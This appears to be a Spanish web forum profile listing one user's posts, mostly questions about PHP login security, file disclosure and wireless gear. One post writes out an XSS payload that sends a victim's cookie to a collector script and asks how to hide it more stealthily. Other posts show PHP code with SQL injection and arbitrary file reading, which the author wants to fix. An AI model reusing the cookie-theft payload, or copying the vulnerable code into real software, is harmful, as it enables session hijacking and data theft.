Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - pedrox@

Páginas1
#1
PHP / [ayuda] redimensionar imagenes
12 Marzo 2009, 15:00 PM
Hola buenas,
Bueno pues tengo una duda,

estoy haciendo una web en la que lo usuarios pueden subir fotos, pero lo que quiero es que se queden todas iguales y a ser posible escribir un mensaje en la imagen (por ejemplo el nombre de la web). Se podría hacer que al subirse ya se redimensine y se guarde?

Si alguién lo ha hecho alguna vez, le agradecería si me podría prestar el código.

Un saludo y gracias de antemano.
#2
Nivel Web / Duda sobre XSS
2 Marzo 2009, 01:52 AM
Bueno me he puesto a leer un poco sobre XSS y hacer pruebas en mi localhost, hize un script vulnerable a XSS (vuln.php) y otro que recoge la cookie (xss.php) por la variable 'cookie'.

Entonces si entraría a:
http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>

en un archivo llamado log.html se me escribiría la cookie, bien...
No podría meter ese enlace entre etiquetas <img> por ejemplo:

prueba.html
<img src="http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>">

para que cuando habra prueba.html se envie la petición get con esa url y se guarde la cookie menos sospechosamente?

Intente hacerlo asi y no me rulo, pase la url por urlencode() y tampoco.

Un saludo y gracias de antemano  ;)
#3
PHP / Proteger login contra bruteforcers
27 Febrero 2009, 00:22 AM
Hola buenas!

Bueno estaba haciendo un login para mi web con php, mysql.
Bueno por ejemplo:

Código (html4strict) [Seleccionar]

<form action="/index.php" method="post">
<p>
  <input type="text" name="usuario" value="Nombre usuario" onClick="this.value=''">
    </p>
<p><br>
      <input type="password" name="clave" value="Password" onClick="this.value=''">
  <br>
  <br>
      <input type="submit" name="enviar" value="Enviar">
 
    </p>
</form>

compruebo que si $_POST['enviar'] tiene valor, cogo $_POST['usuario'] y $_POST['clave'], envio la consulta a la db, si me devuelve algun resultado, creo una session, sino muestro el típico error.

Entonces cualquier persona malintencionada que vería el login de mi web, podría ver los nombres de los campos que uso para enviar el usuario, password (en el fuente html), el error que muestra al no hacer login, hacerse un pequeño script en perl o en lo que sea y enviar valores mediante peticiones POST a los campos hasta obtener usuario, password...

Soluciones??
pues sí, se podría usar captcha, una tabla en la db que guarde los logins fallidos por ip, si hace 3 o los que sea bloquee la ip y tal...

Alguien sabe hacerlo de otra forma y que sea seguro?

Un saludo y gracias de antemano...
#4
PHP / Ayuda con sistema login
27 Agosto 2008, 19:47 PM
hola a todos
estoy creando un sistema de login para mi web pero veo que me estoy liando y nose de que forma hacerlo seguro, esto es lo que llevo hecho:

esta es la tabla SQL:

Código (sql) [Seleccionar]
CREATE TABLE users(
id INT NOT NULL AUTO_INCREMENT,
PRIMARY KEY(id),
username VARCHAR(30) NOT NULL,
password VARCHAR(20) NOT NULL);

-- USERS --
INSERT INTO `users` VALUES (1, 'admin', '827ccb0eea8a706c4c34a16891f84e7b');


Aquí el code php (login.php):

Código (php) [Seleccionar]

<?php

$dbhost 'localhost';
$dbuser 'root';
$dbpass '12345';
$db  'web';

$conectar mysql_connect($dbhost,$dbuser,$dbpass); 
mysql_select_db($db,$conectar);

if (isset($_SESSION['admin_username'])){
 echo "Ya estás autentificado";
        header("Location: admin.php");
}

if ($_POST['username']) {
 $username $_POST['username'];
 $password $_POST['password'];
if ($password==NULL) {
 echo "La password no fue enviada";
 }
else{
 $query mysql_query("SELECT username,password FROM users WHERE username = '$username'") or die(mysql_error());
 $data mysql_fetch_array($query);
 if($data['password'] != md5($password)) {
 echo "Login incorrecto";
 }
$query mysql_query("SELECT username,password FROM users WHERE username = '$username'") or die(mysql_error());
 $row mysql_fetch_array($query);
 $_SESSION["admin_username"] = $row['username'];
 echo "Has sido logueado correctamente ".$_SESSION['admin_username']." y puedes acceder al admin.php.";
 }
 }
?>


<form action='login.php' method='POST'>
<table style='border:1px solid #000000;'>
<tr>
<td align='right'>
Nombre de usuario: <input type='text' size='15' maxlength='25' name='username'>
</td>
</tr>
<tr>
<td align='right'>
Password: <input type='password' size='15' maxlength='25' name='password'>
</td>
</tr>
<tr>
<td align='center'>
<input type="submit" value="Login">
</td>
</tr>
<tr>
<td align='center'>
</td>
</tr>
</table>
</form>

Creo que me estoy complicando bastante para lo que quiero hacer, tambien hay un par de SQL Injections por ahí... ¿Como lo podría mejorar? ¿Qué cambiarian del código? ¿Cómo lo puedo hacer más seguro?

cheers!
#5
PHP / Duda con Remote File Disclosure
13 Agosto 2008, 14:40 PM
Hola buenas.

¿De que manera podría parchear un Remote File Disclosure?
Ejemplo código:

Código (php) [Seleccionar]
<?php

$filename $_GET['filename'];
$fp fopen($filename'r');
$doc fread($fpfilesize($file));
echo $doc;

?>

Con este tipo de fallo el atacante podría leer cualquier archivo de texto plano:
http://localhost/archivovulnerable.php?filename=/etc/group

¿Qué formas habría de solucionar este fallo?

Salu2
#6
Materiales y equipos / ¿Que les parece este chip?
6 Agosto 2008, 10:04 AM
Hola buenas tenia idea de comprar una tarjeta con el chip "Zydas 1211b" y una antena de 9 dBi omnidireccional. ¿Qué les parece ese chip? Sirve para auditoria wireless? Puedo usar la tarjeta para conectarme desde windows y linux? Sobre que precio podría salir?

Saludos.
Páginas1